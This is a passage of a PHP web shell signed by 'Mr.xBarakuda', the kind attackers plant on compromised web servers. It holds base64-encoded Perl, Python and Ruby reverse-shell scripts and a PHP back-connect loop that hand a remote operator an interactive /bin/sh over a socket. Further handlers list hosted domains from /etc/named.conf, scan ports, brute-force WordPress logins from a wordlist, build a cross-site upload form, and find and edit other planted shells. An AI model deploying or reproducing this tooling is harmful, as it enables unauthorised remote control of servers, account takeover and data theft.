        $brt=@fopen('bp.pl','w');
      fwrite($brt,$bp);
      $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
      sleep(1);
      echo "<center><pre>$out
".exe("ps aux | grep bp.pl")."</pre></center>";
      unlink("bp.pl");
          }
          if($_POST['backconnect'] == 'perl') {
      $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
      $plbc=@fopen('bc.pl','w');
      fwrite($plbc,$bc);
      $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
      sleep(1);
      echo "<center><pre>$out
".exe("ps aux | grep bc.pl")."</pre></center>";
      unlink("bc.pl");
      }
      if($_POST['backconnect'] == 'python') {
      $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
      $pbcaa=@fopen('bcpyt.py','w');
      fwrite($pbcaa,$becaa);
      $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
      sleep(1);
      echo "<center><pre>$out1
".exe("ps aux | grep bcpyt.py")."</pre></center>";
      unlink("bcpyt.py");
      }
      if($_POST['backconnect'] == 'ruby') {
      $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
      $pbcaak=@fopen('bcruby.rb','w');
      fwrite($pbcaak,$becaak);
      $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
      sleep(1);
      echo "<center><pre>$out2
".exe("ps aux | grep bcruby.rb")."</pre></center>";
      unlink("bcruby.rb");
      }
      if($_POST['backconnect'] == 'php') {
                  $ip = $_POST['server'];
                  $port = $_POST['port'];
                  $sockfd = fsockopen($ip , $port , $errno, $errstr );
                  if($errno != 0){
                    echo "<br><font color='red'>$errno: $errstr</font>";
                  } else if (!$sockfd)  {
                    $result = "<br><p>Unexpected error has occured, connection may have failed.</p>";
                  } else {
                    fputs ($sockfd ,"
                      
{#######################################}
                      
..:: BackConnect PHP By Mr.xBarakuda ::..
                      
{#######################################}
");
                    $dir = shell_exec("pwd");
                    $sysinfo = shell_exec("uname -a");
                    $time = shell_exec("time");
                    $len = 1337;
                    fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "

");
                    while(!feof($sockfd)){ $cmdPrompt = 'root@mrxbarakuda:~ $';
                    fputs ($sockfd , $cmdPrompt );
                    $command = fgets($sockfd, $len);
                    fputs($sockfd , "
" . shell_exec($command) . "

");
                  }
                  fclose($sockfd);
                }
            }
      }
elseif($_GET['do'] == 'kill') {
	if(@unlink(preg_replace('!(d+)s.*!', '', __FILE__)))
			die('<center><h3>Shell removed</h3>Goodbye, Thanks for take my shell today</center>');
		else
			echo '<center>unlink failed!</center>';
}
elseif($_GET['do'] == 'domains'){echo "<div class=mybox><center><h3>Domains Viewers</h3>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error: can't read [ <font color=red><i>/etc/named.conf</font></i> ]</center>");}echo '<table id="output" border="1"><tr bgcolor=#cecece><td>Domains</td><td>Users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</center></div>';
}
elseif($_GET['do'] == 'ports') {
    
	if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
        $start = strip_tags($_POST['start']);
        $end = strip_tags($_POST['end']);
        $host = strip_tags($_POST['host']);
        for($i = $start; $i<=$end; $i++){
            $fp = @fsockopen($host, $i, $errno, $errstr, 3);
            if($fp){
                echo '<center>Port '.$i.' is <font color=lime>Open</font></center>';
            }
            flush();
        }
    } else {
	echo '<center><h3>Port Scanner</h3>
	<table><form action="" method="post">
	<br><tr><th><td><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
              <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
              <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
              Host: <input type="text" name="host" value="localhost"/><br /><br />
              Port start: <input type="text" name="start" value="0"/><br /><br />
              Port end:<input type="text" name="end" value="5000"/><br /><br />
              <input type="submit" value="Scan Ports" />
              </form></center></th></tr></td></table>';

    }
}
elseif($_GET['do'] == 'wpbf') {
include("../head.php");
set_time_limit(0);
error_reporting(0);
class lugi{
 
        private $host;
        private $user;
        private $open;
        private $lista;
 
  public function banner() {
   echo("    <html>
    <head>
    <style type='text/css'>
	
 textarea {
	 	width: 100%;
	height: 400px;
 }
 

    .ext{
        color: blue;
    }
 
    .area{
        width:400px;
        height:350px;
        resize:none;
    }
 
    </style>
    </head>
    <body>
    <h3><center>WordPress Brute Force</center></h3>
    <form action='' method='POST'>
    <center>Host:<input type='text' name='host' class='con7' placeholder='http://lusuka.co.li/' size='40' > </center><br>
    <center>User:<input type='text' name='user' class='con7' value='admin' size='25'>    </center><br>
    <center>Wordlist</center>
    <center><textarea class='form-control con7' rows='10' name='lista'></textarea><br><br><center>
    <center><input type='Submit' class='kntd' value='Start'></center>
    </form>
    </body>
   </html>");

}
 
    public function extract_post() {
         $this->host = $_POST["host"];
         $this->user = $_POST["user"];
         $this->open = $_POST["lista"];
       }
 
       public function Xregex() {
         if(preg_match("@/wp-login.php@", $this->host)) {
             return true;
         } else {
            $this->host = $_POST["host"]."/wp-login.php";
         }
     }
 
      public function brute() {
           $lista = array_filter(explode("n", $this->open));
           foreach($lista as $this->lista) {
           for($i=0; $i < count($this->lista); $i++) {
                        $this->Xcurl();
                     }
              }
       }
 
        private function cool() {
            echo "[+] Host:"."<font color='white'>{$this->host}</font>";
            echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
            echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
        }
 
        private function Xcurl() {
            $curl = curl_init();
            curl_setopt($curl, CURLOPT_URL, $this->host);
            curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
            curl_setopt($curl, CURLOPT_POST, true);
            curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
            $exec = curl_exec($curl);
            $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
            $this->cool();
            if($http == 302) {
                 echo "<font color='lime'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
                 break;
            } else {
                echo "<font color='red'><br/>[+] Failed</font><br>";
            }
                curl_close($curl);
        }
}
 
$wp = new lugi();
$wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
$wp->banner();
$wp->extract_post();
$wp->Xregex();
$wp->brute();
        
echo "<br>";
}
elseif($_GET['do'] == 'csrf') {
?>
<center><h3> CSRF ONLINE</h3>
<p>Post File Type: Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</p>
<form method="post">
URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
POST File: <input type="text" name="data" size="50" height="10" placeholder="Lihat Diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
<input type="submit" name="go" value="Lock!">
</form></center>
<?php
$url = $_POST['url'];
$data = $_POST['data'];
$submit = $_POST['go'];
if($submit) {
    echo "<center><form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$data'><input type='submit' name='ok' value='Upload'></form></center>";
}
?>
<?php
}
elseif ($_GET['do'] == 'hashid'){
if(isset($_POST['gethash'])){
		$hash = $_POST['hash'];
		if(strlen($hash)==32){
			$hashresult = "MD5 Hash";
		}elseif(strlen($hash)==40){
			$hashresult = "SHA-1 Hash/ /MySQL5 Hash";
		}elseif(strlen($hash)==13){
			$hashresult = "DES(Unix) Hash";
		}elseif(strlen($hash)==16){
			$hashresult = "MySQL Hash / /DES(Oracle Hash)";
		}elseif(strlen($hash)==41){
			$GetHashChar = substr($hash, 40);
			if($GetHashChar == "*"){
				$hashresult = "MySQL5 Hash"; 
			}	
		}elseif(strlen($hash)==64){
			$hashresult = "SHA-256 Hash";
		}elseif(strlen($hash)==96){
			$hashresult = "SHA-384 Hash";
		}elseif(strlen($hash)==128){
			$hashresult = "SHA-512 Hash";
		}elseif(strlen($hash)==34){
			if(strstr($hash, '$1$')){
				$hashresult = "MD5(Unix) Hash";
			} 	
		}elseif(strlen($hash)==37){
			if(strstr($hash, '$apr1$')){
				$hashresult = "MD5(APR) Hash";
			} 	
		}elseif(strlen($hash)==34){
			if(strstr($hash, '$H$')){
				$hashresult = "MD5(phpBB3) Hash";
			} 	
		}elseif(strlen($hash)==34){
			if(strstr($hash, '$P$')){
				$hashresult = "MD5(Wordpress) Hash";
			} 	
		}elseif(strlen($hash)==39){
			if(strstr($hash, '$5$')){
				$hashresult = "SHA-256(Unix) Hash";
			} 	
		}elseif(strlen($hash)==39){
			if(strstr($hash, '$6$')){
				$hashresult = "SHA-512(Unix) Hash";
			} 	
		}elseif(strlen($hash)==24){
			if(strstr($hash, '==')){
				$hashresult = "MD5(Base-64) Hash";
			} 	
		}else{
			$hashresult = "Hash type not found";
		}
	}else{
		$hashresult = "Not Hash Entered";
	}
	
	?>
<center>
<form action="" method="post"><tr>
<table class="tabnet">
<th colspan="5"><h3>Hash Identification</th></h3>
<tr class="optionstr"><b><td>Enter Hash</td></b><td>:</td>	<td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
</table></tr></form>
</center>
<?php
}
elseif($_GET['do'] == 'shellscan') {
    ?>
  <script language="javascript" type="text/javascript">
    function MM_openBrWindow(c,a,b){window.open(c,a,b)}
  </script>
  <style type="text/css">
    .single{border: 1px solid #00ff00; box-shadow: 0px 0px 15px #55FF55; padding: 5px;}
    .me{font-size: 12px; font-family: Share Tech Mono; color: #ccff99; border: 0px; padding: 3px;}
    .isi{padding: 2px; border: 1px solid #666666; font-family: Share Tech Mono; color: #ccff99; background-color: #666666; font-size: 10px; font-weight: bold;}
    #patch {position: absolute; height: 1; width: 1px; top:0; left:0;}
  </style>
  </head>
  <body>
    <center>
      <h3 style="color: white;">Shell Scanner</h3>
    </center>
    <?php
      if(isset($_REQUEST['edit']) && $_REQUEST['edit']=='file'){
         if(isset($_POST['yes'])){
            $filename = $_GET['file'];
            echo "<br><br><br><font color=red size=3><b><center>".$filename." deleted...</b></font><br><br><br><br><br><br><br>";
            unlink($filename);
            echo "<META HTTP-EQUIV=Refresh CONTENT=\"2; URL=javascript:window.close();\">";
         }else{
            if($_POST['update']) {
               $filename = $_POST['file'];
               if(is_writable($filename)) {
                  $handle = fopen($filename, "w+");
                  $isi=$_POST['content'];
                  fwrite($handle, stripslashes($isi));
                  fclose($handle);
                  $stat= "<center><strong>edited successfully<br>";
               } else {
                  $stat= "<center><font color=red><strong>Error! File may not be writable.</font></center>";
               }
            }
            if($_POST['close']) {
               echo "<META HTTP-EQUIV=Refresh CONTENT=\"0; URL=javascript:window.close();\">";
            }
            $filename = $_GET['file'];
            if (file_exists($filename)){
               $vuln = $_GET['bug'];
               $handle = fopen($filename, "r");
               $contents = fread($handle, filesize($filename));
            ?>
    <center>
      <table>
        <tr>
          <td align="left" class="me"><strong><?=$filename?>&nbsp;&nbsp;>> Contains :&nbsp;<?=$vuln?></strong></td>
        </tr>
        <tr>
          <td class="me">
            <form method="post" action="">
              <input type="hidden" name="file" value="<?=$filename?>">
              <textarea name="content" cols="80" rows="15"><?=htmlspecialchars($contents)?></textarea>
              <br>
          </td>
        </tr>
        <tr><td align="center" class="me">
        <?php
          if($_POST['delete']) {
             echo "Are you sure to delete ".$filename." ?";
          ?>
        <tr><td align="center" class="me">
        <input type="submit" name="yes" value=" Y E S ">
        <input type="submit" name="no" value=" N O ">
        </td></tr>
        <?php
          }else{
          echo $stat;
          ?>
        </td></tr>
        <tr><td align="right" class="me">
        <input type="submit" name="close" value=" C l o s e ">
        <input type="submit" name="delete" value=" D e l e t e ">
        <input type="submit" name="update" value=" S a v e ">
        </td></tr>
        <?php
          }
          fclose($handle);
          ?>
      </table>
      </form>
      <?php
        }else{
        echo "<br><br><br><font color=red size=3><b><center>".$filename." not exist...</b></font><br><br><br><br><br><br><br>";
        echo "<META HTTP-EQUIV=Refresh CONTENT=\"4; URL=javascript:window.close();\">";
        }
        ?>
    </center>
    <?php
      }
      }elseif(isset($_POST['Submit'])){
         $ceks = array('base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
         foreach($ceks as $ceker){
            if($_POST[$ceker]<>""){
               $six.=$_POST[$ceker].".";
            }
         }
      $cek = explode('.', $six);
      
      function ListFiles($dir) {
          if($dh = opendir($dir)) {
      
              $files = Array();
              $inner_files = Array();
      
              while($file = readdir($dh)) {
                  if($file != "." && $file != "..") {
                      if(is_dir($dir . "/" . $file)) {
                          $inner_files = ListFiles($dir . "/" . $file);
                          if(is_array($inner_files)) $files = array_merge($files, $inner_files);
                      } else {
                          array_push($files, $dir . "/" . $file);
                      }
                  }
              }
      
              closedir($dh);
              return $files;
          }
      }
         ?>
    <center>
    <table border="0" width="90%" cellpadding="5">
      <tr>
        <td class="me" align="right" width="30"><b>No</b></td>
        <td class="me" align="center" width="105"><b>Type</b></td>
        <td class="me" align="center"><b>File&nbsp;&nbsp;Location</b></td>
        <td class="me" align="center" width="150"><b>Last&nbsp;&nbsp;Edit</b></td>
        <td class="me" align="right" width="80"><b>File&nbsp;&nbsp;Size</b></td>
      </tr>
      <br>
      <?php
        $target=$_SERVER['DOCUMENT_ROOT'];
           foreach (ListFiles($target) as $key=>$file){
              $nFile = substr($file, -4, 4);
              if($nFile == ".php"){
                 if($file==$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF']){
                 }else{
                    $ops = @file_get_contents($file);
                    $op=strtolower($ops);
                    $arr = array('c99_buff_prepare' => 'c 9 9',
                              'abcr57' => 'r 5 7');
                    $sis=0;
                    if($op)
                    $size=filesize($file);
                    $last_modified = filemtime($file);
                    $last=date("M-d-Y H:i", $last_modified);
                    foreach($arr as $key => $val) {
                       if(@preg_match("/$key/", $op)) {
                          $sis=1;
                          $i++;
                          ?>
      <tr style="background-color:Your background Color" onMouseOver="mover(this)" onmouseout="mout(this)">
        <td align="right">
          <font color="red">
            <blink><?=$i?></blink>
          </font>
        </td>
        <td align="center">
          <font color="red">
            <blink><?=$val?></blink>
          </font>
        </td>
        <td align="left">
          <blink>
            <a href="#" class="abunai" onClick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
          </blink>
        </td>
        <td align="center">
          <font color="red">
            <blink><?=$last?> GMT+9</blink>
          </font>
        </td>
        <td align="right">
          <font color="red">
            <blink><?=$size?> byte</blink>
          </font>
        </td>
        <script language="javascript">var bgcolor="transparent";var change_color="#444444";function mover(a){a.style.backgroundColor=change_color}function mout(a){a.style.backgroundColor=bgcolor}</script>
      </tr>
      <?php
        }
        }
        if($sis<>"1"){
        if((@preg_match("/system\((.*?)\)/", $op))&&(@preg_match("/<pre>/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) {
           $sis="2";
           $i++;
           $val="hidden shell";
           ?>
      <tr style="background-color:Your background Color" onMouseOver="mover(this)" onmouseout="mout(this)">
        <td align="right"><font color="#A0CE4E"><?=$i?></font></td>
        <td align="center"><font color="#A0CE4E"><?=$val?></font></td>
        <td align="left">
          <a href="#" class="xxx" onClick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$val?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
        </td>
        <td align="center"><font color="#A0CE4E"><?=$last?> GMT+9</font></td>
        <td align="right"><font color="#A0CE4E"><?=$size?> byte</font></td>
        <script language="javascript">var bgcolor="transparent";var change_color="#444444";function mover(a){a.style.backgroundColor=change_color}function mout(a){a.style.backgroundColor=bgcolor}</script>
      </tr>
      <?php
        }
        }
        if($sis=="0"){
        foreach($cek as $bugs) {
         if ($bugs<>""){
        if(@preg_match("/$bugs\((.*?)\)/", $op)) {
           $i++;
           ?>
      <tr style="background-color:Your background Color" onMouseOver="mover(this)" onmouseout="mout(this)">
        <td align="right"><?=$i?></td>
        <td align="center"><?=$bugs?></td>
        <td align="left">
          <a href="#" onClick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$bugs?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
        </td>
        <td align="center"><?=$last?> GMT+9</td>
        <td align="right"><?=$size?> byte</td>
        <script language="javascript">var bgcolor="transparent";var change_color="#444444";function mover(a){a.style.backgroundColor=change_color}function mout(a){a.style.backgroundColor=bgcolor}</script>
      </tr>
      <?php
        }              
        }
        }
        }
        if($_POST['textV']<>""){
        $text=$_POST['textV'];
           if(@preg_match("/$text/", $op)) {
           $i++;
           ?>
      <tr style="background-color:Your background Color" onMouseOver="mover(this)" onmouseout="mout(this)">
        <td align="right"><?=$i?></td>
        <td align="center"><?=$text?></td>
        <td align="left">
          <a href="#" onClick="MM_openBrWindow('?edit=file&file=<?=$file?>&bug=<?=$text?>','File view','status=yes,scrollbars=yes,width=700,height=600')" rel="nofollow"><?=$file?></a>
        </td>
        <td align="center"><?=$last?> GMT+9</td>
        <td align="right"><?=$size?> byte</td>
        <script language="javascript">var bgcolor="transparent";var change_color="#444444";function mover(a){a.style.backgroundColor=change_color}function mout(a){a.style.backgroundColor=bgcolor}</script>
      </tr>
      <?php
        }
        
        
        }
        }
        }
        }
        if($i==0){
        foreach($cek as $bugs) {
        if ($bugs<>""){
        $x++;
        ?>
      <tr style="background-color:Your background Color" onMouseOver="mover(this)" onmouseout="mout(this)">
        <td align="right"><?=$x?></td>
        <td align="center"><?=$bugs?></td>
        <td align="center"> not exist </td>
        <td align="center"> no record </td>
        <td align="right"> -&nbsp;&nbsp;&nbsp;&nbsp;byte </td>
      </tr>
      <?php
        }
        }
        }
        ?>
    </table>
    <?php
      }else{
         $find = array('default','base64_decode','system','passthru','popen','exec','shell_exec','eval','move_uploaded_file');
      ?>
    <form id="fCheck" name="fCheck" method="post" action="" autocomplete="off">
      <center>
      <table class="single" width="400" border="1" cellpadding="10">
        <tr>
          <td class="me">
            <center>
            <b>S e l e c t &nbsp;&nbsp;S c a n&nbsp;&nbsp;T y p e :</b><br>
            <table class="me" width="200">
              <tr>
                <td class="me">
                  <script language="javascript">function cekKlik(){if(!document.fCheck.cekV.checked){document.fCheck.textV.disabled=true}else{document.fCheck.textV.disabled=false}if(document.fCheck.cekV.checked){master=master+1}else{if(master>0){master=master-1}else{master=master}}if(master!=0){document.fCheck.Submit.disabled=false}else{document.fCheck.Submit.disabled=true}};</script>
                  <?php
                    //dari sini
                    foreach($find as $bug) {
                    ?>
                  <script language="javascript">/*<![CDATA[*/var master=0;function checkValue<?=$bug?>(){if(document.fCheck.<?=$bug?>.checked){master=master+1;}else{if(master>0){master=master-1;}else{master=master;}}
